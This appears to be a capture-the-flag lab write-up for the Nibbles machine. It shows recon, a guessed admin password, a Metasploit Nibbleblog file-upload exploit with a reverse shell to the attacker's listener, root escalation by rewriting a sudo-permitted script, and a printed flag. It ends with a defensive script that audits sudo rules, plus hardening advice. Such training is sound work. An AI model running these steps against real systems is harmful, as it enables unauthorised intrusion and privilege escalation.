Environment:
Local machine: 10.10.15.143
Target (Nibbles): 10.129.200.170
┌─[eu-academy-6]─[10.10.15.143]─[htb-ac-2034323@htb-q0izyqfsj2]─[~]
└──╼ [★]$ whatweb 10.129.200.170
http://10.129.200.170 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.129.200.170]
┌─[eu-academy-6]─[10.10.15.143]─[htb-ac-2034323@htb-q0izyqfsj2]─[~]
└──╼ [★]$ curl 10.129.200.170
<b>Hello world!</b>
<!-- /nibbleblog/ directory. Nothing interesting here! -->
The HTML comment on this page hints that there is a /nibbleblog/ directory.
gobuster dir -u http://10.129.200.170/ --wordlist /usr/share/seclists/Discovery/Web-Content/common.txt
http://10.129.200.170/nibbleblog/content/
Directory listing is enabled.
Seeing this configuration file, we cannot help guessing that the password might be nibbles.
http://10.129.200.170/nibbleblog/content/private/config.xml
<name type="string">Nibbles</name>
<notification_email_to type="string">admin@nibbles.com</notification_email_to>
## Start msfconsole
┌─[eu-academy-6]─[10.10.15.143]─[htb-ac-2034323@htb-q0izyqfsj2]─[~]
└──╼ [★]$ msfconsole
Metasploit tip: Use sessions -1 to interact with the last opened session
=[ metasploit v6.4.71-dev ]
+ -- --=[ 2529 exploits - 1302 auxiliary - 431 post ]
+ -- --=[ 1669 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
## Search for nibbleblog vulnerabilities
[msf](Jobs:0 Agents:0) >> search nibbleblog
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nibbleblog_file_upload 2015-09-01 excellent Yes Nibbleblog File Upload Vulnerability
Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nibbleblog_file_upload
## Use the exploit module
[msf](Jobs:0 Agents:0) >> use 0
msf6 exploit(multi/http/nibbleblog_file_upload) > show options
Module options (exploit/multi/http/nibbleblog_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD nibbles yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.129.42.190 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI nibbleblog yes The base path to the web application
USERNAME admin yes The username to authenticate with
VHOST no HTTP server virtual host
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Nibbleblog 4.0.3
## Run the exploit
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit
## Get a shell that can unzip the archive
(Meterpreter 1)(/home/nibbler) > shell
## Check the user's sudo privileges and directories
sudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
pwd
/home/nibbler
ls
personal.zip
user.txt
## Unzip the archive
unzip personal.zip
Archive: personal.zip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/monitor.sh
ls
personal
personal.zip
user.txt
cd personal
ls
stuff
cd stuff
ls
monitor.sh
## Overwrite monitor.sh with the command to run as root
echo 'cat /root/root.txt' > monitor.sh
## Run the command
sudo ./monitor.sh
## Get the flag
de5e5d6619862a8aa5b9b
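The root step works because the sudo rule points at a script sitting under the user's own home directory, so the user can simply rewrite it. The following POSIX shell script is an added example (not part of the original write-up) that a defender or auditor can run on a host to find exactly this misconfiguration: it parses `sudo -l` output in the format shown above, and for every NOPASSWD target checks whether the file is missing, owned by a non-root user, group/world-writable, or sits in a directory that is. The embedded `sudo -l` text is a constructed copy of the output from this box; the function names are my own.

```shell
#!/bin/sh
# Added example, not from the original write-up: audit "sudo -l" output for
# NOPASSWD targets that a non-root user could replace. Assumes the output
# format shown above and POSIX tools (awk, ls, dirname).

# Constructed sample: the "sudo -l" output captured on the box, embedded so the
# script runs offline. The path is the one from the write-up.
SAMPLE_SUDO_L='Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh'

# sudo_targets: read "sudo -l" output on stdin and print each absolute path
# that can be run without a password, one per line.
sudo_targets() {
    awk '/NOPASSWD:/ { for (i = 1; i <= NF; i++) if ($i ~ /^\//) print $i }'
}

# writable_by_others PATH: succeed when PATH is owned by a non-root user or is
# group- or world-writable. Permission string from "ls -ld" (e.g. -rwxr-xr-x):
# character 6 is the group write bit, character 9 the "other" write bit.
writable_by_others() {
    line=$(ls -ld "$1") || return 1
    perms=$(printf '%s' "$line" | awk '{print $1}')
    owner=$(printf '%s' "$line" | awk '{print $3}')
    [ "$owner" != "root" ] && return 0
    case "$perms" in
        ?????w*|????????w*) return 0 ;;
    esac
    return 1
}

# check_sudo_target PATH: print a finding and return 1 when PATH is missing,
# or when PATH or its parent directory can be modified by a non-root user
# (either lets that user decide what sudo runs as root). Return 0 otherwise.
check_sudo_target() {
    target="$1"
    if [ ! -e "$target" ]; then
        echo "MISSING  $target  (rule points at a file that does not exist; whoever can create it controls it)"
        return 1
    fi
    if writable_by_others "$target"; then
        echo "WRITABLE $target  (the script itself can be modified by a non-root user)"
        return 1
    fi
    if writable_by_others "$(dirname "$target")"; then
        echo "WRITABLE $(dirname "$target")  (parent directory allows the script to be replaced)"
        return 1
    fi
    echo "OK       $target"
    return 0
}

# audit_sudo_l: read "sudo -l" output on stdin, check every target, and return
# the number of findings (0 means nothing to report). Targets are split on
# whitespace, so paths containing spaces are not handled.
audit_sudo_l() {
    findings=0
    for t in $(sudo_targets); do
        check_sudo_target "$t" || findings=$((findings + 1))
    done
    return "$findings"
}

# Demo run against the embedded sample; on a live host use: sudo -l | audit_sudo_l
printf '%s\n' "$SAMPLE_SUDO_L" | audit_sudo_l
echo "findings: $?"
```

On the Nibbles box itself this reports `monitor.sh` as writable, since the file and every directory above it up to `/home/nibbler` belong to `nibbler`. The fix on the defender's side is to keep any sudo-permitted script root-owned in a root-owned directory (for example under `/usr/local/sbin`) with mode 755 or stricter, and to re-run this audit after every sudoers change.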